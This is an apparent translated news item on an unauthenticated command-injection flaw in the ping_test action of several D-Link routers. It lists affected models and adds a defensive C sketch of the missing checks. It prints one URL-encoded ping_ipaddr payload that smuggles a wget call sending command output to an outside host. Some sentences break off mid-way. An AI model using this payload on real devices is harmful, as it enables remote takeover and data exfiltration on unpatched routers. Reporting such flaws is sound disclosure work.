In D-Link wireless routers
Interestingly, according to the firmware developers, the "ping_test" call was supposed to be made only after authentication, but in practice it is called in every case, regardless of whether the user is logged in to the web interface. Specifically, when the apply_sec.cgi script is accessed with the parameter "action=ping_test", the script redirects to the authentication page but at the same time performs the action associated with ping_test. To execute code, a second flaw in ping_test itself was used: it calls the ping utility without properly checking the validity of the IP address submitted for testing. For example, to invoke the wget utility and send the result of the "echo 1234" command to an external host, it is enough to specify the parameter "ping_ipaddr=127.0.0.1%0awget%20-P%20/tmp/%20http://test.test/?$(echo 1234)".
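The two checks whose absence is described above, shown as an added example that is not D-Link's firmware code: the handler returns before any action when the session is not authenticated, and the address must parse as an IP literal and is passed to ping as a separate argument instead of through a shell. The names `dispatch`, `is_ip_literal`, the result codes and the `/bin/ping` path are assumptions made for this sketch.

```c
#include <arpa/inet.h>
#include <stddef.h>
#include <string.h>

/* Hypothetical result codes for this sketch. */
enum result { RUN_PING, NEED_LOGIN, BAD_ADDRESS, UNKNOWN_ACTION };

/* Accept only a literal IPv4 or IPv6 address. inet_pton() rejects any
 * trailing bytes, so "127.0.0.1\nwget ..." fails as a whole. */
static int is_ip_literal(const char *s)
{
    unsigned char buf[sizeof(struct in6_addr)];

    if (s == NULL || strlen(s) >= INET6_ADDRSTRLEN)
        return 0;
    return inet_pton(AF_INET, s, buf) == 1 ||
           inet_pton(AF_INET6, s, buf) == 1;
}

/* Decide what to do with a request. `authenticated` is the session state;
 * `action` and `ping_ipaddr` are the already URL-decoded form fields.
 * On RUN_PING, argv is filled for execv("/bin/ping", argv) (assumed path):
 * no shell is involved, so the address is never parsed as command text. */
enum result dispatch(int authenticated, const char *action,
                     const char *ping_ipaddr, const char *argv[5])
{
    /* The auth check comes first and returns, so no action runs
     * alongside the redirect to the login page. */
    if (!authenticated)
        return NEED_LOGIN;
    if (action == NULL || strcmp(action, "ping_test") != 0)
        return UNKNOWN_ACTION;
    if (!is_ip_literal(ping_ipaddr))
        return BAD_ADDRESS;

    argv[0] = "ping";
    argv[1] = "-c";
    argv[2] = "1";
    argv[3] = ping_ipaddr;
    argv[4] = NULL;
    return RUN_PING;
}
```
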
The presence of the vulnerability has been officially confirmed in the following models:
- DIR-655 with firmware 3.02b05 or higher;
- DIR-866L with firmware 1.03b04 or higher;
- DIR-1565 with firmware 1.01 or higher;
- DIR-652 (no information about the affected firmware versions was provided)
The support period for these models has already expired, so D-Link
It was later discovered that the vulnerability was also
source: budenet.ru